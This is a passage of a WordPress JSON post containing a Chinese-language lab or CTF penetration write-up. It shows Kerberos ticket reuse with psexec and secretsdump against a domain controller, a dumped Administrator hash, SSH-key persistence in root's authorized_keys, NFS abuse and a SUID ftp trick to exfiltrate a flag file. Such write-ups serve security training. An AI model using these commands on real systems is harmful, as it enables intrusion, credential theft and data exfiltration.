KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u6539\/etc\/hosts\u628adc\u52a0\u8fdb\u53bb\uff0c\u5373\u53ef\u65e0\u5bc6\u7801\u8fde\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/11-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"586\" height=\"202\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/11-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2734\"  sizes=\"auto, (max-width: 586px) 100vw, 586px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u6211\u5f53\u65f6\u50bb\u903c\u4e86\uff0c\u60f3\u7740\u8fd8\u5269\u4e00\u4e2aflag\u6ca1\u6253\u90a3\u5c31\u6293\u4e00\u4e0b\u54c8\u5e0c\u6a2a\u5411\u8fc7\u53bb\uff0c\u4f46\u6700\u540e\u4e00\u4e2aflag\u5728\u7684\u5730\u65b9\u662f\u90a3\u4e2acentos\u673a\u5668\u91cc\uff0c\u4e0d\u5728\u57df\u5185\uff0c\u4e0d\u8fc7\u8fd9\u91cc\u4e5f\u7ed9\u4e00\u4e0b\u5f53\u65f6\u7684\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 secretsdump.py -k -no-pass WIN-DC.xiaorang.lab -dc-ip 172.22.60.8<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/12-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"457\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/12-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2735\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<p>\u867d\u7136\u6293\u5230\u4e86\u54c8\u5e0c\u4f46\u6ca1\u5375\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a:<\/code><\/pre>\n\n\n\n<p>\u56de\u5230\u8fd9\u4e2alinux\u670d\u52a1\u5668\uff0c\u56e0\u4e3a\u6211\u4eec\u4e4b\u524d\u662f\u5f39shell\u6253\u7684\uff0c\u547d\u4ee4\u6267\u884c\u5f88\u9ebb\u70e6\u800c\u4e14\u6ca1\u6cd5\u6301\u4e45\u5316\u5229\u7528\uff0c\u6240\u4ee5\u6211\u7ed9root\u76ee\u5f55\u4e0b\u5199\u4e86ssh-keygen\u516c\u94a5\u7136\u540e\u5c31\u53ef\u4ee5\u7528\u79c1\u94a5\u8fde\u4e0a\u53bb\u4e86\u3002<\/p>\n\n\n\n<p>\u5148\u5728\u672c\u5730\u673a\u5b50\u521b\u5efarsa\u5bc6\u94a5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh-keygen -t rsa -b 4096<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"601\" height=\"121\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2713\"  sizes=\"auto, (max-width: 601px) 100vw, 601px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6211\u751f\u6210\u7684\u516c\u79c1\u94a5\u521b\u5efa\u5728\u4e86\/home\/fushuling\/.ssh\/\u76ee\u5f55\u4e0b\uff0c\/home\/fushuling\/.ssh\/id_rsa.pub\u7684\u5185\u5bb9\u5c31\u662f\u6211\u4eec\u8981\u5199\u5165\u7684\u516c\u94a5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"722\" height=\"217\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2714\"  sizes=\"auto, (max-width: 722px) 100vw, 722px\" \/><\/div><\/figure>\n\n\n\n<p>\u5728\u5f39\u7684shell\u4e0a\u6267\u884c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/root\nmkdir .ssh<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u628a\u516c\u94a5\u4f20\u8fdb\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo \"\u516c\u94a5\u5185\u5bb9\" >>\/root\/.ssh\/authorized_keys<\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u56de\u5230\u6211\u4eec\u672c\u5730\u7684\u673a\u5b50\u4e0a\uff0c\u5c31\u80fd\u7528\u79c1\u94a5\u8fde\u63a5\u4e0a\u53bb\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"617\" height=\"267\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2715\"  sizes=\"auto, (max-width: 617px) 100vw, 617px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f53\u7136\uff0c\u6211\u4eec\u4e5f\u53ef\u4ee5\u628aid_rsa\u7684\u5185\u5bb9\u4fdd\u5b58\u51fa\u6765\u7528xshell\u8fde\u4e0a\u53bb\uff0c\u6211\u540e\u9762\u5c31\u8fd9\u4e48\u6253\u7684<\/p>\n\n\n\n<p>\u9898\u76ee\u8bf4\u6709\u4e00\u4e2aNFS\u670d\u52a1\uff0c\u4e5f\u5c31\u662f\u90a3\u4e2acentos\uff0c\u9996\u5148\u66f4\u65b0\u4e00\u4e0b\u8fde\u4e0a\u53bb\u7684\u90a3\u53f0\u673a\u5b50\u4e0a\u7684\u4f9d\u8d56\uff0c\u4e0d\u7136\u6ca1\u6709\u76f8\u5e94\u7684\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo sed -i 's\/archive.ubuntu.com\/mirrors.aliyun.com\/g' \/etc\/apt\/sources.list\nsudo apt-get update\napt-get install nfs-common -y<\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u5728\u6839\u76ee\u5f55\u6302\u8f7d\u4e00\u4e0b\u670d\u52a1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/\nmkdir temp\nmount -t nfs 172.22.13.57:\/ .\/temp -o nolock<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"641\" height=\"189\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2716\"  sizes=\"auto, (max-width: 641px) 100vw, 641px\" \/><\/div><\/figure>\n\n\n\n<p>\u6302\u8f7d\u4e86\u4e4b\u540e\u53ea\u80fd\u8bbf\u95eehome\u76ee\u5f55\uff0c\u6211\u4eec\u518d\u6b21\u5199\u516c\u94a5\uff0c\u5c31\u80fd\u8fde\u4e0acentos\u673a\u5668\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh-keygen -t rsa -b 4096\ncd \/temp\/home\/joyce\/\nmkdir .ssh\ncat \/root\/.ssh\/id_rsa.pub >> \/temp\/home\/joyce\/.ssh\/authorized_keys\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\nssh  -i \/root\/.ssh\/id_rsa joyce@172.22.13.57<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"983\" height=\"731\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2717\"  sizes=\"auto, (max-width: 983px) 100vw, 983px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0a\u53bb\u4e4b\u540e\u6839\u76ee\u5f55\u6709\u4e00\u4e2aflag\u4f46\u6ca1\u6743\u9650\u8bfb\uff0c\u6709\u4e00\u4e2a\u7528\u6237\u8d26\u6237\u4f46\u6ca1\u4ec0\u4e48\u5375\u7528\uff0c\u770b\u4e00\u4e0b\u600e\u4e48\u63d0\u6743<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>find \/ -user root -perm -4000 -exec ls -ldb {} \\;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"882\" height=\"367\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2718\"  sizes=\"auto, (max-width: 882px) 100vw, 882px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e00\u773cftp\uff0c\u8fd9\u4e2a\u80fdsuid\u6240\u4ee5\u6211\u4eec\u80fd\u628aflag\u4f20\u5230ftp\u91cc\u3002\u6700\u521d\u6211\u4eec\u83b7\u5f97\u7684\u673a\u5668\u91cc\u90a3\u4e2aftp\u670d\u52a1\u6ca1\u6743\u9650\u4f20\uff0c\u6211\u4eec\u518d\u8d77\u4e2a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 -m pyftpdlib -p 6666 -u test -P test -w &amp;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"280\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2719\"  sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u8fde\u4e0a\u53bb(\u6ce8\u610f\u662f\u5185\u7f51ip)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ftp 172.22.13.14 6666\nput \/flag02.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/23.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"544\" height=\"314\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/23.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2720\"  sizes=\"auto, (max-width: 544px) 100vw, 544px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u6211\u4eec\u5728\u5916\u9762\u8fde\u4e00\u4e0b\u5c31\u80fd\u627e\u5230\u4f20\u4e0a\u6765\u7684flag\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-1024x539.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"539\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-1024x539.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2721\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u770b\u4e86\u4e00\u4e0bx1r0z\u7684wp\uff0cNFS\u8fd9\u91cc\u4f3c\u4e4e\u80fd\u76f4\u63a5\u63d0\u6743:<a href=\"https:\/\/xz.aliyun.com\/t\/11664#toc-12\">nfs\u63d0\u6743<\/a>\uff0c\u4e0d\u8fc7\u6211\u90fd\u7528suid\u4e86\uff0c\u8fd9\u91cc\u5c31\u7565\u8fc7\u4e86<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9\uff1a<br \/>\nxstream RCE<br \/>\nmysql\u5f31\u53e3\u4ee4+\u5199\u9a6c<br \/>\nACL Admins\u5199RBCD<br \/>\nlinux\u5199\u516c\u94a5\u8fde\u63a5<br \/>\nNFS\u5229\u7528<br \/>\nftp\u63d0\u6743<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-2706","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2706","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2706"}],"version-history":[{"count":10,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2706\/revisions"}],"predecessor-version":[{"id":2740,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2706\/revisions\/2740"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2706"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=2706"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2706"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}